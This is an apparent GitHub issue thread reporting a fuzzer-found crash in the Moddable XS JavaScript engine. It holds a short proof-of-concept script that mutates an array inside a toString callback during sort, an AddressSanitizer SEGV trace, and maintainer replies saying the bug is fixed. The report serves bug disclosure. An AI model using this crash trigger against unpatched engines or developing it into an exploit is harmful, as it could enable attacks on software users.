Closed hope-fly closed 2 years ago
When the testcase changed a little, there's a new crash during fuzzing. I'm not sure whether it's a duplicated issue or not. If its not, I'll open a new issue. Hope the info listed as follows will be helpful!
```javascript
var size = 1000;
var array1 = new Array(size);
function toStr() {
array1.splice(0, 2);
return array1.toString();
}
function JSEtest() {
for (var i = 0; i < size; i++) {
array1[i] = new Array(i);
array1.sort()[i].toString = toStr;
}
array1.sort();
}
JSEtest();
```
$ ./moddable/build/bin/lin/debug/xst poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==39035==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000004c0 (pc 0x00000059c0a6 bp 0x7ffc9a80fa50 sp 0x7ffc9a80f730 T0)
==39035==The signal is caused by a READ memory access.
==39035==Hint: address points to the zero page.
#0 0x59c0a5 in fxCompareArrayItem /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18
#1 0x57dc9a in fx_Array_prototype_sort /home/f1yfuzz/moddable/xs/sources/xsArray.c:2235:14
#2 0x84f3ca in fxRunID /home/f1yfuzz/moddable/xs/sources/xsRun.c:842:7
#3 0x8ceaac in fxRunScript /home/f1yfuzz/moddable/xs/sources/xsRun.c:4766:4
#4 0xad3231 in fxRunProgramFile /home/f1yfuzz/moddable/xs/tools/xst.c:1387:2
#5 0xacfa83 in main /home/f1yfuzz/moddable/xs/tools/xst.c:281:8
#6 0x7f8d44116bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#7 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18 in fxCompareArrayItem
==39035==ABORTING
Thanks! From a quick look, it is tough to say if these are the same cause or not – the tests and crash are quite similar but the crash is in a different place. We'll investigate and let you know.
This has been resolved in our most recent Moddable SDK update. There were changes to Array sorting and a change to xst to ensure a clean exit when the JavaScript stack overflow is detected. Thank you again for the report.
Moddable-XS revision
Commit: 2f93df29
Version: 11.5.0 32 4
Build environment
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
Test case
poc.js
Execution & Output
Credits: Found by OWL337 team.